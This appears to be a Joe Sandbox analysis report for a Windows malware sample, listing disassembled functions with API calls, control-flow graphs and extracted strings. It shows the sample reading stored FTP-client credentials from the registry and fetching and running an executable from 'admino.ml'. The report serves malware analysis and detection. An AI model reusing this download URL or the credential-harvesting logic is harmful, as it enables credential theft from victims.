                                                Yara matches
                                                Similarity
                                                • API ID: InitializeNameUser
                                                • String ID: 4225
                                                • API String ID: 2272643758-3256947014
                                                • Opcode ID: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                                • Instruction ID: f8a90d01b74eef74cfed5de9fe492a059dec9afd9cac863eb884a77ae8a26fbd
                                                • Opcode Fuzzy Hash: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                                • Instruction Fuzzy Hash: 1FF0FE74654209ADDB20BBB2DD076DD3AA65B0030CF14443BB918F11E2DAFD45C4EA2D
                                                Function 004105D6 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                                                • RevertToSelf.ADVAPI32 ref: 00410601
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterRevertSelfUnhandled
                                                • String ID:
                                                • API String ID: 669012916-0
                                                • Opcode ID: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                • Instruction ID: 497a937cfd444ccb75a01f451d1fff2a03657cb5d6782b497a70bab0a2736278
                                                • Opcode Fuzzy Hash: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                • Instruction Fuzzy Hash: 92D067744451498AD6757BF6A80A7DC3651ABC430EF40843FA401109A7CEFD24D8CD2F
                                                Function 0040F984 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91ce3f8c0f1bd09a143b1812374b0f813c50b60ad23a99001a06984c0b8e56f8
                                                • Instruction ID: d83f140231b2433478d0a28666096bc940b33525d9759782800d4ca776c3ccd3
                                                • Opcode Fuzzy Hash: 91ce3f8c0f1bd09a143b1812374b0f813c50b60ad23a99001a06984c0b8e56f8
                                                • Instruction Fuzzy Hash: EB110471608244FFDB214B59CC06F953F74E701B50F144037F80A629E2C33D4995EA4A
                                                Function 004059A4 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A74
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                • API String ID: 1332880857-44262141
                                                • Opcode ID: e976e2a34d5e340282ec8372c36bf609406961023f5be640681139a220b80d6e
                                                • Instruction ID: ef9fb06cd34c7ccf76aa40754f09ac5043f5b2b84b8ceac9111509753786a159
                                                • Opcode Fuzzy Hash: e976e2a34d5e340282ec8372c36bf609406961023f5be640681139a220b80d6e
                                                • Instruction Fuzzy Hash: 51218131640A08FADF11AB50CC02FDD3B75AB84B05F20C167B515740E1DABD5AD0AF8C
                                                Function 004020B9 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 172registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402166
                                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
                                                • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                                                • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004022B5
                                                • GlobalLock.KERNEL32(?), ref: 004022E5
                                                • GlobalUnlock.KERNEL32(?), ref: 00402304
                                                • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 00402316
                                                • GlobalLock.KERNEL32(?), ref: 00402346
                                                • GlobalUnlock.KERNEL32(?), ref: 00402365
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                • String ID: 8Ap$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$XDp
                                                • API String ID: 4234118056-1123427017
                                                • Opcode ID: 1bdbc9636d64f6988254104348b2b22802a161d16057e81c9594173105e17b62
                                                • Instruction ID: e8800f7e17a62db29e95db71b44d800467aa85f06a3210c5d1cd602f7ee17b8c
                                                • Opcode Fuzzy Hash: 1bdbc9636d64f6988254104348b2b22802a161d16057e81c9594173105e17b62
                                                • Instruction Fuzzy Hash: 54614A35900168BADF31AB61CD46FE97679EB44308F1040FAB588B11E1D7F89ED4AE68
                                                Function 0040FE88 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 202 40fe88-40fe90 203 410061-410064 202->203 204 40fe96-40fe9e call 403d6d 202->204 206 40fea3-40fea5 204->206 207 40feab-40feb2 206->207 208 41004f-41005b 206->208 207->208 209 40feb8-40fed2 call 401788 207->209 208->203 208->204 212 40ff0b-40ff0e 209->212 213 40ff10-40ff3b call 4012bb call 401133 212->213 214 40fed4-40ff0a wsprintfA call 401e4c 212->214 221 40ff41-40ff4b 213->221 222 410039-41004a call 4018b8 call 401021 213->222 214->212 221->222 223 40ff51-40ff64 GetTempPathA 221->223 222->208 223->222 225 40ff6a-40ff6f 223->225 225->222 227 40ff75-40ffab GetTickCount wsprintfA CreateDirectoryA call 4025a9 225->227 231 40ffcd-40ffdb call 401df8 227->231 232 40ffad-40ffcb call 401df8 call 401e4c 227->232 235 40ffe0-40fff9 call 401463 231->235 232->235 241 40fffb-410029 lstrlen call 4026dd ShellExecuteA 235->241 242 41002e-410034 call 4018b8 235->242 241->242 242->222
                                                APIs
                                                  • Part of subcall function 00401788: GetHGlobalFromStream.OLE32(?,?), ref: 00401795
                                                  • Part of subcall function 00401788: GlobalLock.KERNEL32(?), ref: 004017AC
                                                  • Part of subcall function 00401788: GlobalUnlock.KERNEL32(?), ref: 004017C4
                                                • wsprintfA.USER32 ref: 0040FEEA
                                                • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                                                • GetTickCount.KERNEL32 ref: 0040FF75
                                                • wsprintfA.USER32 ref: 0040FF87
                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                                                • lstrlen.KERNEL32(true,?,00000000), ref: 00410000
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
                                                • String ID: %02X$%d.exe$MZ$http://admino.ml/eme/kachistub.exe$open$true
                                                • API String ID: 3844566713-2745409385
                                                • Opcode ID: 0d76fbcb0b14d752bb8ae91c82b55ed4428da859b986344cc61ad5509a06a30c
                                                • Instruction ID: 798d6633d1dddfa29f699b8c5659430589b66450ff5dd2e29decf7e633b954bc
                                                • Opcode Fuzzy Hash: 0d76fbcb0b14d752bb8ae91c82b55ed4428da859b986344cc61ad5509a06a30c
                                                • Instruction Fuzzy Hash: 93417B71900228AADB30AB61DC46FEEBBB99B05305F1005FBB548B11E1D6F84FC49F58
                                                Function 00402C01 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 402 402c01-402c12 403 402c14 402->403 404 402c15-402c1d 402->404 405 402c31-402c35 404->405 406 402c1f-402c26 404->406 406->405 407 402c28-402c2f 406->407 407->405 408 402c36-402c4c GetCurrentProcess OpenProcessToken 407->408 409 402ce2-402ce6 408->409 410 402c52-402c6e GetTokenInformation 408->410 411 402c70-402c78 GetLastError 410->411 412 402cda-402cdd CloseHandle 410->412 411->412 413 402c7a-402c7e 411->413 412->409 413->412 414 402c80-402ca2 call 4018cf GetTokenInformation 413->414 417 402cd2-402cd5 call 4018b8 414->417 418 402ca4-402cb6 ConvertSidToStringSidA 414->418 417->412 418->417 419 402cb8-402cc7 lstrcmp 418->419 421 402cc9 419->421 422 402cca-402ccd LocalFree 419->422 421->422 422->417
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: S-1-5-18
                                                • API String ID: 0-4289277601
                                                • Opcode ID: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                                • Instruction ID: d6a68a7a6fba872fbc8a204bfee8a5bac27731b7f04a2bc92072417478d2585c
                                                • Opcode Fuzzy Hash: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                                • Instruction Fuzzy Hash: 69216230908209BFEF119BA0DD4ABEE7B79FB40305F104576A500B51E1D7F99A90DB1C
                                                Function 0040668F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 423 40668f-4066ac RegOpenKeyA 424 406911-406912 423->424 425 4066b2 423->425 426 4066b9-4066e0 RegEnumKeyExA 425->426 427 4066e2-40690c RegCloseKey 426->427 428 4066e7-4067a5 call 401df8 call 401e4c call 401d71 * 5 426->428 427->424 444 4067a7-4067ae 428->444 445 4067ba 428->445 444->445 446 4067b0-4067b8 444->446 447 4067c4-4067e9 call 4018b8 call 401d71 445->447 446->447 452 4067eb-4067f2 447->452 453 4067fe 447->453 452->453 454 4067f4-4067fc 452->454 455 406808-406815 call 4018b8 453->455 454->455 458 406856-40685d 455->458 459 406817-40681e 455->459 461 4068ca-406904 call 4018b8 * 5 458->461 462 40685f-406866 458->462 459->458 460 406820-406836 call 4043dc 459->460 470 406841-40684c call 4018b8 460->470 471 406838-40683f 460->471 461->426 462->461 465 406868-40686f 462->465 465->461 466 406871-4068c5 call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb 465->466 466->461 470->458 471->458 471->470
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004066D9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                • API String ID: 1332880857-4069465341
                                                • Opcode ID: 28cd642b9a14632e63f69432792bab59c27dff5175793cf9a6a00b0a1e583e89
                                                • Instruction ID: ddbf5386c557692e0a2d872b86364cc9d1953b440620d6587ff0ea321d438c9c
                                                • Opcode Fuzzy Hash: 28cd642b9a14632e63f69432792bab59c27dff5175793cf9a6a00b0a1e583e89
                                                • Instruction Fuzzy Hash: 9551E43194011CEADF217B51CC02BED7AB9BF44308F10C5BAA549750B1DB7A5BA5DF88
                                                Function 0040D072 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 492 40d072-40d08c RegOpenKeyA 493 40d092 492->493 494 40d2c7-40d2c8 492->494 495 40d099-40d0c0 RegEnumKeyExA 493->495 496 40d0c2-40d2c2 RegCloseKey 495->496 497 40d0c7-40d15e call 401df8 * 2 call 4018b8 call 401d71 * 4 495->497 496->494 513 40d160-40d167 497->513 514 40d179-40d17b 497->514 513->514 515 40d169-40d177 call 4018b8 513->515 516 40d183 514->516 517 40d17d-40d17e call 4018b8 514->517 520 40d18d-40d1ca call 401d71 * 2 515->520 516->520 517->516 526 40d1d0-40d1e6 call 4043dc 520->526 527 40d264-40d2ba call 4018b8 * 5 call 40d072 call 4018b8 520->527 526->527 533 40d1e8-40d1ec 526->533 527->495 533->527 534 40d1ee-40d1f5 533->534 534->527 536 40d1f7-40d1fe 534->536 536->527 538 40d200-40d25f call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb * 2 536->538 538->527
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0B9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                • API String ID: 1332880857-2649023343
                                                • Opcode ID: 26b4e598b9372ea9a7266eecca5fc6ce7ec23d02ee09a61f1aff9897374d5be7
                                                • Instruction ID: 6c2faa976b9052ac72c52ca6464a050bd4b3273960fb2c20a586784dcbee0562
                                                • Opcode Fuzzy Hash: 26b4e598b9372ea9a7266eecca5fc6ce7ec23d02ee09a61f1aff9897374d5be7
                                                • Instruction Fuzzy Hash: 6251C831840218BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9B95AF98
                                                Function 00407BBA Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 561 407bba-407bd4 RegOpenKeyA 562 407bda 561->562 563 407e1c-407e1d 561->563 564 407be1-407c08 RegEnumKeyExA 562->564 565 407c0a-407e17 RegCloseKey 564->565 566 407c0f-407cc2 call 401df8 * 2 call 4018b8 call 401d71 * 5 564->566 565->563 584 407cc4-407ccb 566->584 585 407cdd-407cdf 566->585 584->585 586 407ccd-407cdb call 4018b8 584->586 587 407ce1-407ce2 call 4018b8 585->587 588 407ce7 585->588 591 407cf1-407d18 call 401d71 586->591 587->588 588->591 595 407db9-407e0f call 4018b8 * 5 call 407bba call 4018b8 591->595 596 407d1e-407d25 591->596 595->564 596->595 597 407d2b-407d32 596->597 597->595 599 407d38-407d92 call 401569 call 4015cb * 3 call 401569 call 4015cb 597->599 625 407d94-407d9b 599->625 626 407daf-407db4 call 401569 599->626 625->626 627 407d9d-407dad call 401569 625->627 626->595 627->595
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C01
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                • API String ID: 1332880857-3874328862
                                                • Opcode ID: 2c8a0ba067aeae211804c2b3bc1768c6308746ccaa7f1f6ecbc86453ddc7cdbe
                                                • Instruction ID: 1780444ab987c72a7c0881d1e1f70479cbe17c78eae0564416758d360709c296
                                                • Opcode Fuzzy Hash: 2c8a0ba067aeae211804c2b3bc1768c6308746ccaa7f1f6ecbc86453ddc7cdbe
                                                • Instruction Fuzzy Hash: 7051E131900118FADF226F61CC42BED7AB9BF04344F10C5BAB548750B1DB7A6A91AF99
                                                Function 0040DC62 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCA9
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                • API String ID: 1332880857-3620412361
                                                • Opcode ID: e6211431e13e1cf627f221f8aaeb6b63aab97b3a1b50d2f0ce6b7fc3b5632f45
                                                • Instruction ID: 9e186bede9d82e05e6d3405ca47770cfa7b4b9f889abd471e1f7745202da50bf
                                                • Opcode Fuzzy Hash: e6211431e13e1cf627f221f8aaeb6b63aab97b3a1b50d2f0ce6b7fc3b5632f45
                                                • Instruction Fuzzy Hash: 32519671850118AADF226F61CC42FDD7ABAFF04304F1085B6B548750B1DF7A9AA5AFC8
                                                Function 00407F0C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F53
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                • API String ID: 1332880857-2128033141
                                                • Opcode ID: 95adbcca4e30ed0107d4c85792cdc31850d83065dac8f4d6df457c6753f9edcc
                                                • Instruction ID: 5ab7ce4d41d7449111e2bf0245fe8bdc2d5e3158fb84ab1408711ceaad0d48f8
                                                • Opcode Fuzzy Hash: 95adbcca4e30ed0107d4c85792cdc31850d83065dac8f4d6df457c6753f9edcc
                                                • Instruction Fuzzy Hash: C4519431840118BADF226F51CD42FED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88
                                                Function 004026DD Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84registryfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 750 4026dd-4026ff RegCreateKeyA 751 402701-402718 RegSetValueExA 750->751 752 402723-402725 750->752 753 40271a 751->753 754 40271b-40271e RegCloseKey 751->754 755 4027f0-4027f4 752->755 756 40272b-40273e GetTempPathA 752->756 753->754 754->752 756->755 757 402744-402749 756->757 757->755 758 40274f-40276b CreateDirectoryA call 4025a9 757->758 761 402789-402793 call 401df8 758->761 762 40276d-402787 call 401df8 call 401e4c 758->762 765 402798-4027bc ExitProcess 761->765 762->765 767 4027d6-4027d8 765->767 768 4027be-4027d1 call 401422 CloseHandle 765->768 772 4027e5-4027eb call 4018b8 767->772 773 4027da-4027e0 DeleteFileA 767->773 768->767 772->755 773->772
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                                                • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                                                • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
                                                • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
                                                • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                                                • String ID: Software\WinRAR
                                                • API String ID: 2428708885-224198155
                                                • Opcode ID: 986673cc228dc13c8f70e56d3af3248f7e43fa717c1056dcfd0bbbd5ca96e852
                                                • Instruction ID: 28b2972cc479343a501f6bdb5bbfbd3fa5c74dd95b9eafedc45f56a84fd52fee
                                                • Opcode Fuzzy Hash: 986673cc228dc13c8f70e56d3af3248f7e43fa717c1056dcfd0bbbd5ca96e852
                                                • Instruction Fuzzy Hash: 7621743194020DBBDF216FA0CD86FDD7A69AB14748F100076B214B61E1E6F99AD06B18
                                                Function 0040504B Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414847,?,00000104,?), ref: 004050BF
                                                • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414847,?,00000104,?), ref: 004050FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
